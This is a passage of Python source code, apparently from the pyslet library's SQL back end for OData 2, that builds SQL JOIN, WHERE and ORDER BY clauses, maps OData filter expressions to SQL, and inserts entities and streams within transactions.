join = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
else:
# relation is in an auxiliary table
src_set, src_name, dst_set, dst_name, ukeys = \
self.container.aux_table[link_end.parent.name]
if self.entity_set is src_set:
name2 = dst_name
else:
name2 = src_name
aux_table_name = self.container.mangled_names[(
link_end.parent.name, )]
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias, self.container.mangled_names[
(link_end.parent.name, self.entity_set.name,
name, key_name)]))
join = ' LEFT JOIN %s AS %s ON %s' % (
aux_table_name, alias, ' AND '.join(join))
self._aliases.add(alias)
join2 = []
alias2 = self.next_alias()
for key_name in target_set.keys:
join2.append(
'%s.%s=%s.%s' %
(alias, self.container.mangled_names[
(link_end.parent.name, target_set.name,
name2, key_name)],
alias2, self.container.mangled_names[
(target_set.name, key_name)]))
join2 = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias2, ' AND '.join(join2))
self._aliases.add(alias2)
alias = alias2
self._joins[name] = (alias, join + join2)
return alias
def join_clause(self):
"""A utility method to return the JOIN clause.
Defaults to an empty expression."""
if self._joins is None:
self.reset_joins()
return ''.join(x[1] for x in dict_values(self._joins))
def set_filter(self, filter):
self._joins = None
self.filter = filter
self.set_page(None)
self._sqlLen = None
self._sqlGen = None
def where_clause(
self,
entity,
params,
use_filter=True,
use_skip=False,
null_cols=()):
"""A utility method that generates the WHERE clause for a query
entity
An optional entity within this collection that is the focus
of this query. If not None the resulting WHERE clause will
restrict the query to this entity only.
params
The :py:class:`SQLParams` object to add parameters to.
use_filter
Defaults to True, indicates if this collection's filter should
be added to the WHERE clause.
use_skip
Defaults to False, indicates if the skiptoken should be used
in the where clause. If True then the query is limited to
entities appearing after the skiptoken's value (see below).
null_cols
An iterable of mangled column names that must be NULL (defaults
to an empty tuple). This argument is used during updates to
prevent the replacement of non-NULL foreign keys.
The operation of the skiptoken deserves some explanation. When in
play the skiptoken contains the last value of the order expression
returned. The order expression always uses the keys to ensure
unambiguous ordering. The clause added is best served with an
example. If an entity has key K and an order expression such
as "tolower(Name) desc" then the query will contain
something like::
SELECT K, Nname, DOB, LOWER(Name) AS o_1, K ....
WHERE (o_1 < ? OR (o_1 = ? AND K > ?))
The values from the skiptoken will be passed as parameters."""
where = []
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
for nullCol in null_cols:
where.append('%s IS NULL' % nullCol)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def where_entity_clause(self, where, entity, params):
"""Adds the entity constraint expression to a list of SQL expressions.
where
The list to append the entity expression to.
entity
An expression is added to restrict the query to this entity"""
for k, v in dict_items(entity.key_dict()):
where.append(
'%s.%s=%s' %
(self.table_name,
self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(v))))
def where_skiptoken_clause(self, where, params):
"""Adds the entity constraint expression to a list of SQL expressions.
where
The list to append the skiptoken expression to."""
skip_expression = []
i = ket = 0
while True:
if self.orderby and i < len(self.orderby):
oname = None
expression, dir = self.orderby[i]
else:
oname, dir = self.orderNames[i]
v = self.skiptoken[i]
op = ">" if dir > 0 else "<"
if oname is None:
o_expression = self.sql_expression(expression, params, op)
else:
o_expression = oname
skip_expression.append(
"(%s %s %s" %
(o_expression,
op,
params.add_param(
self.container.prepare_sql_value(v))))
ket += 1
i += 1
if i < len(self.orderNames):
# more to come
if oname is None:
# remake the expression
o_expression = self.sql_expression(expression, params, '=')
skip_expression.append(
" OR (%s = %s AND " %
(o_expression, params.add_param(
self.container.prepare_sql_value(v))))
ket += 1
continue
else:
skip_expression.append(")" * ket)
break
where.append(''.join(skip_expression))
def set_orderby(self, orderby):
"""Sets the orderby rules for this collection.
We override the default implementation to calculate a list
of field name aliases to use in ordered queries. For example,
if the orderby expression is "tolower(Name) desc" then each SELECT
query will be generated with an additional expression, e.g.::
SELECT ID, Name, DOB, LOWER(Name) AS o_1 ...
ORDER BY o_1 DESC, ID ASC
The name "o_1" is obtained from the name mangler using the tuple::
(entity_set.name,'o_1')
Subsequent order expressions have names 'o_2', 'o_3', etc.
Notice that regardless of the ordering expression supplied the
keys are always added to ensure that, when an ordering is
required, a defined order results even at the expense of some
redundancy."""
self.orderby = orderby
self.set_page(None)
self.orderNames = []
if self.orderby is not None:
oi = 0
for expression, direction in self.orderby:
oi = oi + 1
oname = "o_%i" % oi
oname = self.container.mangled_names.get(
(self.entity_set.name, oname), oname)
self.orderNames.append((oname, direction))
for key in self.entity_set.keys:
mangled_name = self.container.mangled_names[
(self.entity_set.name, key)]
mangled_name = "%s.%s" % (self.table_name, mangled_name)
self.orderNames.append((mangled_name, 1))
self._sqlGen = None
def orderby_clause(self):
"""A utility method to return the orderby clause.
params
The :py:class:`SQLParams` object to add parameters to."""
if self.orderNames:
orderby = []
for expression, direction in self.orderNames:
orderby.append(
"%s %s" % (expression, "DESC" if direction < 0 else "ASC"))
return ' ORDER BY ' + ", ".join(orderby) + ' '
else:
return ''
def orderby_cols(self, column_names, params, force_order=False):
"""A utility to add the column names and aliases for the ordering.
column_names
A list of SQL column name/alias expressions
params
The :py:class:`SQLParams` object to add parameters to.
force_order
Forces the addition of an ordering by key if an orderby
expression has not been set."""
oname_index = 0
if self.orderby is not None:
for expression, direction in self.orderby:
oname, odir = self.orderNames[oname_index]
oname_index += 1
sql_expression = self.sql_expression(expression, params)
column_names.append("%s AS %s" % (sql_expression, oname))
if self.orderby is not None or force_order:
# add the remaining names (which are just the keys)
while oname_index < len(self.orderNames):
oname, odir = self.orderNames[oname_index]
oname_index += 1
column_names.append(oname)
def _mangle_name(self, source_path, prefix=True):
mangled_name = self.container.mangled_names[source_path]
if prefix:
mangled_name = "%s.%s" % (self.table_name, mangled_name)
return mangled_name
def insert_fields(self, entity):
"""A generator for inserting mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Read only fields are never generated, even if they are keys.
This allows automatically generated keys to be used and also
covers the more esoteric use case where a foreign key constraint
exists on the primary key (or part thereof) - in the latter case
the relationship should be marked as required to prevent
unexpected constraint violations.
Otherwise, only selected fields are yielded so if you attempt to
insert a value without selecting the key fields you can expect a
constraint violation unless the key is read only."""
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (source_path not in self.container.ro_names and
entity.is_selected(k)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix=False), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix=False), fv
def auto_fields(self, entity):
"""A generator for selecting auto mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Only fields that are read only are yielded with the caveat that
they must also be either selected or keys. The purpose of this
method is to assist with reading back automatically generated
field values after an insert or update."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (source_path in self.container.ro_names and (
entity.is_selected(k) or k in keys)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path), fv
def key_fields(self, entity):
"""A generator for selecting mangled key names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Only the keys fields are yielded."""
for k in entity.entity_set.keys:
v = entity[k]
source_path = (self.entity_set.name, k)
yield self._mangle_name(source_path), v
def select_fields(self, entity, prefix=True):
"""A generator for selecting mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Only selected fields are yielded with the caveat that the keys
are always selected."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (k in keys or entity.is_selected(k)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix), fv
def update_fields(self, entity):
"""A generator for updating mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Neither read only fields nor key are generated. All other
fields are yielded but unselected fields are set to NULL before
being yielded. This implements OData's PUT semantics. See
:py:meth:`merge_fields` for an alternative."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if k in keys or source_path in self.container.ro_names:
continue
if not entity.is_selected(k):
v.set_null()
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix=False), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix=False), fv
def merge_fields(self, entity):
"""A generator for merging mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Neither read only fields, keys nor unselected fields are
generated. All other fields are yielded implementing OData's
MERGE semantics. See
:py:meth:`update_fields` for an alternative."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (k in keys or
source_path in self.container.ro_names or
not entity.is_selected(k)):
continue
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path), fv
def _complex_field_generator(self, ct):
for k, v in ct.iteritems():
if isinstance(v, edm.SimpleValue):
yield [k], v
else:
for source_path, fv in self._complex_field_generator(v):
yield [k] + source_path, fv
def stream_field(self, entity, prefix=True):
"""Returns information for selecting the stream ID.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
Returns a tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance)."""
source_path = (self.entity_set.name, '_value')
return self._mangle_name(source_path, prefix), \
edm.EDMValue.from_type(edm.SimpleType.Int64)
SQLBinaryExpressionMethod = {}
SQLCallExpressionMethod = {}
def sql_expression(self, expression, params, context="AND"):
"""Converts an expression into a SQL expression string.
expression
A :py:class:`pyslet.odata2.core.CommonExpression` instance.
params
A :py:class:`SQLParams` object of the appropriate type for
this database connection.
context
A string containing the SQL operator that provides the
context in which the expression is being converted, defaults
to 'AND'. This is used to determine if the resulting
expression must be bracketed or not. See
:py:meth:`sql_bracket` for a useful utility function to
illustrate this.
This method is basically a grand dispatcher that sends calls to
other node-specific methods with similar signatures. The effect
is to traverse the entire tree rooted at *expression*.
The result is a string containing the parameterized expression
with appropriate values added to the *params* object *in the same
sequence* that they appear in the returned SQL expression.
When creating derived classes to implement database-specific
behaviour you should override the individual evaluation methods
rather than this method. All related methods have the same
signature.
Where methods are documented as having no default implementation,
NotImplementedError is raised."""
if isinstance(expression, core.UnaryExpression):
raise NotImplementedError
elif isinstance(expression, core.BinaryExpression):
return getattr(
self,
self.SQLBinaryExpressionMethod[
expression.operator])(
expression,
params,
context)
elif isinstance(expression, UnparameterizedLiteral):
return self.container.ParamsClass.escape_literal(
to_text(expression.value))
elif isinstance(expression, core.LiteralExpression):
return params.add_param(
self.container.prepare_sql_value(
expression.value))
elif isinstance(expression, core.PropertyExpression):
try:
p = self.entity_set.entityType[expression.name]
if isinstance(p, edm.Property):
if p.complexType is None:
field_name = self.container.mangled_names[
(self.entity_set.name, expression.name)]
return "%s.%s" % (self.table_name, field_name)
else:
raise core.EvaluationError(
"Unqualified property %s "
"must refer to a simple type" %
expression.name)
except KeyError:
raise core.EvaluationError(
"Property %s is not declared" % expression.name)
elif isinstance(expression, core.CallExpression):
return getattr(
self,
self.SQLCallExpressionMethod[
expression.method])(
expression,
params,
context)
def sql_bracket(self, query, context, operator):
"""A utility method for bracketing a SQL query.
query
The query string
context
A string representing the SQL operator that defines the
context in which the query is to placed. E.g., 'AND'
operator
The dominant operator in the query.
This method is used by operator-specific conversion methods.
The query is not parsed, it is merely passed in as a string to be
bracketed (or not) depending on the values of *context* and
*operator*.
The implementation is very simple, it checks the precedence of
*operator* in *context* and returns *query* bracketed if
necessary::
collection.sql_bracket("Age+3","*","+")=="(Age+3)"
collection.sql_bracket("Age*3","+","*")=="Age*3" """
if SQLOperatorPrecedence[context] > SQLOperatorPrecedence[operator]:
return "(%s)" % query
else:
return query
def sql_expression_member(self, expression, params, context):
"""Converts a member expression, e.g., Address/City
This implementation does not support the use of navigation
properties but does support references to complex properties.
It outputs the mangled name of the property, qualified by the
table name."""
name_list = self._calculate_member_field_name(expression)
context_def = self.entity_set.entityType
depth = 0
table_name = self.table_name
entity_set = self.entity_set
path = []
for name in name_list:
if context_def is None:
raise core.EvaluationError("Property %s is not declared" %
'/'.join(name_list))
p = context_def[name]
if isinstance(p, edm.Property):
path.append(name)
if p.complexType is not None:
context_def = p.complexType
else:
context_def = None
elif isinstance(p, edm.NavigationProperty):
if depth > 0:
raise NotImplementedError(
"Member expression exceeds maximum navigation depth")
else:
table_name = self.add_join(name)
context_def = p.to_end.entityType
depth += 1
path = []
entity_set = entity_set.get_target(name)
# the result must be a simple property, so context_def must not be None
if context_def is not None:
raise core.EvaluationError(
"Property %s does not reference a primitive type" %
'/'.join(name_list))
field_name = self.container.mangled_names[
tuple([entity_set.name] + path)]
return "%s.%s" % (table_name, field_name)
def _calculate_member_field_name(self, expression):
if isinstance(expression, core.PropertyExpression):
return [expression.name]
elif (isinstance(expression, core.BinaryExpression) and
expression.operator == core.Operator.member):
return (
self._calculate_member_field_name(expression.operands[0]) +
self._calculate_member_field_name(expression.operands[1]))
else:
raise core.EvaluationError("Unexpected use of member expression")
def sql_expression_cast(self, expression, params, context):
"""Converts the cast expression: no default implementation"""
raise NotImplementedError
def sql_expression_generic_binary(
self,
expression,
params,
context,
operator):
"""A utility method for implementing binary operator conversion.
The signature of the basic :py:meth:`sql_expression` is extended
to include an *operator* argument, a string representing the
(binary) SQL operator corresponding to the expression object."""
query = []
query.append(
self.sql_expression(expression.operands[0], params, operator))
query.append(' ')
query.append(operator)
query.append(' ')
query.append(
self.sql_expression(expression.operands[1], params, operator))
return self.sql_bracket(''.join(query), context, operator)
def sql_expression_mul(self, expression, params, context):
"""Converts the mul expression: maps to SQL "*" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'*')
def sql_expression_div(self, expression, params, context):
"""Converts the div expression: maps to SQL "/" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'/')
def sql_expression_mod(self, expression, params, context):
"""Converts the mod expression: no default implementation"""
raise NotImplementedError
def sql_expression_add(self, expression, params, context):
"""Converts the add expression: maps to SQL "+" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'+')
def sql_expression_sub(self, expression, params, context):
"""Converts the sub expression: maps to SQL "-" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'-')
def sql_expression_lt(self, expression, params, context):
"""Converts the lt expression: maps to SQL "<" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<')
def sql_expression_gt(self, expression, params, context):
"""Converts the gt expression: maps to SQL ">" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'>')
def sql_expression_le(self, expression, params, context):
"""Converts the le expression: maps to SQL "<=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<=')
def sql_expression_ge(self, expression, params, context):
"""Converts the ge expression: maps to SQL ">=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'>=')
def sql_expression_isof(self, expression, params, context):
"""Converts the isof expression: no default implementation"""
raise NotImplementedError
def sql_expression_eq(self, expression, params, context):
"""Converts the eq expression: maps to SQL "=" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'=')
def sql_expression_ne(self, expression, params, context):
"""Converts the ne expression: maps to SQL "<>" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'<>')
def sql_expression_and(self, expression, params, context):
"""Converts the and expression: maps to SQL "AND" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'AND')
def sql_expression_or(self, expression, params, context):
"""Converts the or expression: maps to SQL "OR" """
return self.sql_expression_generic_binary(
expression,
params,
context,
'OR')
def sql_expression_endswith(self, expression, params, context):
"""Converts the endswith function: maps to "op[0] LIKE '%'+op[1]"
This is implemented using the concatenation operator"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
concat = core.CallExpression(core.Method.concat)
concat.operands.append(percent)
concat.operands.append(expression.operands[1])
query = []
query.append(
self.sql_expression(expression.operands[0], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(concat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_indexof(self, expression, params, context):
"""Converts the indexof method: maps to POSITION( op[0] IN op[1] )"""
query = ["POSITION("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(" IN ")
query.append(self.sql_expression(expression.operands[1], params, ','))
query.append(")")
return ''.join(query)
def sql_expression_replace(self, expression, params, context):
"""Converts the replace method: no default implementation"""
raise NotImplementedError
def sql_expression_startswith(self, expression, params, context):
"""Converts the startswith function: maps to "op[0] LIKE op[1]+'%'"
This is implemented using the concatenation operator"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
concat = core.CallExpression(core.Method.concat)
concat.operands.append(expression.operands[1])
concat.operands.append(percent)
query = []
query.append(
self.sql_expression(expression.operands[0], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(concat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_tolower(self, expression, params, context):
"""Converts the tolower method: maps to LOWER function"""
return "LOWER(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_toupper(self, expression, params, context):
"""Converts the toupper method: maps to UCASE function"""
return "UPPER(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_trim(self, expression, params, context):
"""Converts the trim method: maps to TRIM function"""
return "TRIM(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_substring(self, expression, params, context):
"""Converts the substring method
maps to SUBSTRING( op[0] FROM op[1] [ FOR op[2] ]"""
query = ["SUBSTRING("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(" FROM ")
query.append(self.sql_expression(expression.operands[1], params, ','))
if len(expression.operands > 2):
query.append(" FOR ")
query.append(
self.sql_expression(expression.operands[2], params, ','))
query.append(")")
return ''.join(query)
def sql_expression_substringof(self, expression, params, context):
"""Converts the substringof function
maps to "op[1] LIKE '%'+op[0]+'%'"
To do this we need to invoke the concatenation operator.
This method has been poorly defined in OData with the parameters
being switched between versions 2 and 3. It is being withdrawn
as a result and replaced with contains in OData version 4. We
follow the version 3 convention here of "first parameter in the
second parameter" which fits better with the examples and with
the intuitive meaning::
substringof(A,B) == A in B"""
percent = edm.SimpleValue.from_type(edm.SimpleType.String)
percent.set_from_value("'%'")
percent = UnparameterizedLiteral(percent)
rconcat = core.CallExpression(core.Method.concat)
rconcat.operands.append(expression.operands[0])
rconcat.operands.append(percent)
lconcat = core.CallExpression(core.Method.concat)
lconcat.operands.append(percent)
lconcat.operands.append(rconcat)
query = []
query.append(
self.sql_expression(expression.operands[1], params, 'LIKE'))
query.append(" LIKE ")
query.append(self.sql_expression(lconcat, params, 'LIKE'))
return self.sql_bracket(''.join(query), context, 'LIKE')
def sql_expression_concat(self, expression, params, context):
"""Converts the concat method: maps to ||"""
query = []
query.append(self.sql_expression(expression.operands[0], params, '*'))
query.append(' || ')
query.append(self.sql_expression(expression.operands[1], params, '*'))
return self.sql_bracket(''.join(query), context, '*')
def sql_expression_length(self, expression, params, context):
"""Converts the length method: maps to CHAR_LENGTH( op[0] )"""
return "CHAR_LENGTH(%s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_year(self, expression, params, context):
"""Converts the year method: maps to EXTRACT(YEAR FROM op[0])"""
return "EXTRACT(YEAR FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_month(self, expression, params, context):
"""Converts the month method: maps to EXTRACT(MONTH FROM op[0])"""
return "EXTRACT(MONTH FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_day(self, expression, params, context):
"""Converts the day method: maps to EXTRACT(DAY FROM op[0])"""
return "EXTRACT(DAY FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_hour(self, expression, params, context):
"""Converts the hour method: maps to EXTRACT(HOUR FROM op[0])"""
return "EXTRACT(HOUR FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_minute(self, expression, params, context):
"""Converts the minute method: maps to EXTRACT(MINUTE FROM op[0])"""
return "EXTRACT(MINUTE FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_second(self, expression, params, context):
"""Converts the second method: maps to EXTRACT(SECOND FROM op[0])"""
return "EXTRACT(SECOND FROM %s)" % self.sql_expression(
expression.operands[0],
params,
',')
def sql_expression_round(self, expression, params, context):
"""Converts the round method: no default implementation"""
raise NotImplementedError
def sql_expression_floor(self, expression, params, context):
"""Converts the floor method: no default implementation"""
raise NotImplementedError
def sql_expression_ceiling(self, expression, params, context):
"""Converts the ceiling method: no default implementation"""
raise NotImplementedError
SQLCollectionBase.SQLCallExpressionMethod = {
core.Method.endswith: 'sql_expression_endswith',
core.Method.indexof: 'sql_expression_indexof',
core.Method.replace: 'sql_expression_replace',
core.Method.startswith: 'sql_expression_startswith',
core.Method.tolower: 'sql_expression_tolower',
core.Method.toupper: 'sql_expression_toupper',
core.Method.trim: 'sql_expression_trim',
core.Method.substring: 'sql_expression_substring',
core.Method.substringof: 'sql_expression_substringof',
core.Method.concat: 'sql_expression_concat',
core.Method.length: 'sql_expression_length',
core.Method.year: 'sql_expression_year',
core.Method.month: 'sql_expression_month',
core.Method.day: 'sql_expression_day',
core.Method.hour: 'sql_expression_hour',
core.Method.minute: 'sql_expression_minute',
core.Method.second: 'sql_expression_second',
core.Method.round: 'sql_expression_round',
core.Method.floor: 'sql_expression_floor',
core.Method.ceiling: 'sql_expression_ceiling'
}
SQLCollectionBase.SQLBinaryExpressionMethod = {
core.Operator.member: 'sql_expression_member',
core.Operator.cast: 'sql_expression_cast',
core.Operator.mul: 'sql_expression_mul',
core.Operator.div: 'sql_expression_div',
core.Operator.mod: 'sql_expression_mod',
core.Operator.add: 'sql_expression_add',
core.Operator.sub: 'sql_expression_sub',
core.Operator.lt: 'sql_expression_lt',
core.Operator.gt: 'sql_expression_gt',
core.Operator.le: 'sql_expression_le',
core.Operator.ge: 'sql_expression_ge',
core.Operator.isof: 'sql_expression_isof',
core.Operator.eq: 'sql_expression_eq',
core.Operator.ne: 'sql_expression_ne',
core.Operator.boolAnd: 'sql_expression_and',
core.Operator.boolOr: 'sql_expression_or'
}
class SQLEntityCollection(SQLCollectionBase):
"""Represents a collection of entities from an :py:class:`EntitySet`.
This class is the heart of the SQL implementation of the API,
constructing and executing queries to implement the core methods
from :py:class:`pyslet.odata2.csdl.EntityCollection`."""
def insert_entity(self, entity):
"""Inserts *entity* into the collection.
We override this method, rerouting it to a SQL-specific
implementation that takes additional arguments."""
self.insert_entity_sql(entity)
def new_stream(self, src, sinfo=None, key=None):
e = self.new_entity()
if key is None:
e.auto_key()
else:
e.set_key(key)
if sinfo is None:
sinfo = core.StreamInfo()
etag = e.etag_values()
if len(etag) == 1 and isinstance(etag[0], edm.BinaryValue):
h = hashlib.sha256()
etag = etag[0]
else:
h = None
c, v = self.stream_field(e, prefix=False)
if self.container.streamstore:
# spool the data into the store and store the stream key
estream = self.container.streamstore.new_stream(sinfo.type,
sinfo.created)
with self.container.streamstore.open_stream(estream, 'w') as dst:
sinfo.size, sinfo.md5 = self._copy_src(src, dst, sinfo.size, h)
if sinfo.modified is not None:
# force modified date based on input
estream['modified'].set_from_value(
sinfo.modified.shift_zone(0))
estream.commit()
v.set_from_value(estream.key())
else:
raise NotImplementedError
if h is not None:
etag.set_from_value(h.digest())
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
# now try the insert and loop with random keys if required
for i in range3(100):
try:
self.insert_entity_sql(e, transaction=transaction)
break
except edm.ConstraintError:
# try a different key
e.auto_key()
if not e.exists:
# give up - we can't insert anything
logging.error("Failed to find an unused key in %s "
"after 100 attempts", e.entity_set.name)
raise edm.SQLError("Auto-key failure")
# finally, store the stream value for the entity
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
query.append(
"%s=%s" %
(c, params.add_param(self.container.prepare_sql_value(v))))
query.append(' WHERE ')
where = []
for k, kv in dict_items(e.key_dict()):
where.append(
'%s=%s' %
(self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(kv))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
except Exception as e:
# we allow the stream store to re-use the same database but
# this means we can't transact on both at once (from the
# same thread) - settle for logging at the moment
# self.container.streamstore.delete_stream(estream)
logging.error("Orphan stream created %s[%i]",
estream.entity_set.name, estream.key())
transaction.rollback(e)
finally:
transaction.close()
return e
def insert_entity_sql(
self,
entity,
from_end=None,
fk_values=None,
transaction=None):
"""Inserts *entity* into the collection.
This method is not designed to be overridden by other
implementations but it does extend the default functionality for
a more efficient implementation and to enable better
transactional processing. The additional parameters are
documented here.
from_end
An optional :py:class:`pyslet.odata2.csdl.AssociationSetEnd`
bound to this entity set. If present, indicates that this
entity is being inserted as part of a single transaction
involving an insert or update to the other end of the
association.
This suppresses any check for a required link via this
association (as it is assumed that the link is present, or
will be, in the same transaction).
fk_values
If the association referred to by *from_end* is represented
by a set of foreign keys stored in this entity set's table
(see :py:class:`SQLReverseKeyCollection`) then fk_values is
the list of (mangled column name, value) tuples that must be
inserted in order to create the link.
transaction
An optional transaction. If present, the connection is left
uncommitted.
The method functions in three phases.
1. Process all bindings for which we hold the foreign key.
This includes inserting new entities where deep inserts are
being used or calculating foreign key values where links to
existing entities have been specified on creation.
In addition, all required links are checked and raise errors
if no binding is present.
2. A simple SQL INSERT statement is executed to add the record
to the database along with any foreign keys generated in (1)
or passed in *fk_values*.
3. Process all remaining bindings. Although we could do this
using the
:py:meth:`~pyslet.odata2.csdl.DeferredValue.update_bindings`
method of DeferredValue we handle this directly to retain
transactional integrity (where supported).
Links to existing entities are created using the insert_link
method available on the SQL-specific
:py:class:`SQLNavigationCollection`.
Deep inserts are handled by a recursive call to this method.
After step 1, the only bindings that remain are (a) those
that are stored at the other end of the link and so can be
created by passing values for *from_end* and *fk_values* in a
recursive call or (b) those that are stored in a separate
table which are created by combining a recursive call and a
call to insert_link.
Required links are always created in step 1 because the
overarching mapping to SQL forces such links to be represented
as foreign keys in the source table (i.e., this table) unless
the relationship is 1-1, in which case the link is created in
step 3 and our database is briefly in violation of the model. If
the underlying database API does not support transactions then
it is possible for this state to persist resulting in an orphan
entity or entities, i.e., entities with missing required links.
A failed :py:meth:`rollback` call will log this condition along
with the error that caused it."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
if entity.exists:
raise edm.EntityExists(str(entity.get_location()))
# We must also go through each bound navigation property of our
# own and add in the foreign keys for forward links.
if fk_values is None:
fk_values = []
fk_mapping = self.container.fk_table[self.entity_set.name]
try:
transaction.begin()
nav_done = set()
for link_end, nav_name in dict_items(self.entity_set.linkEnds):
if nav_name:
dv = entity[nav_name]
if (link_end.otherEnd.associationEnd.multiplicity ==
edm.Multiplicity.One):
# a required association
if link_end == from_end:
continue
if nav_name is None:
# unbound principal; can only be created from this
# association
raise edm.NavigationError(
"Entities in %s can only be created "
"from their principal" % self.entity_set.name)
if not dv.bindings:
raise edm.NavigationError(
"Required navigation property %s of %s "
"is not bound" % (nav_name, self.entity_set.name))
aset_name = link_end.parent.name
# if link_end is in fk_mapping it means we are keeping a
# foreign key for this property, it may even be required but
# either way, let's deal with it now. We're only interested
# in associations that are bound to navigation properties.
if link_end not in fk_mapping or nav_name is None:
continue
nullable, unique = fk_mapping[link_end]
target_set = link_end.otherEnd.entity_set
if len(dv.bindings) == 0:
# we've already checked the case where nullable is False
# above
continue
elif len(dv.bindings) > 1:
raise edm.NavigationError(
"Unexpected error: found multiple bindings "
"for foreign key constraint %s" % nav_name)
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
# just a key, grab the entity
with target_set.open() as targetCollection:
targetCollection.select_keys()
target_entity = targetCollection[binding]
dv.bindings[0] = target_entity
else:
target_entity = binding
if not target_entity.exists:
# add this entity to it's base collection
with target_set.open() as targetCollection:
targetCollection.insert_entity_sql(
target_entity,
link_end.otherEnd,
transaction=transaction)
# Finally, we have a target entity, add the foreign key to
# fk_values
for key_name in target_set.keys:
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name,
aset_name,
key_name)],
target_entity[key_name]))
nav_done.add(nav_name)
# Step 2
try:
entity.key()
except KeyError:
# missing key on insert, auto-generate if we can
for i in range3(100):
entity.auto_key()
if not self.test_key(entity, transaction):
break
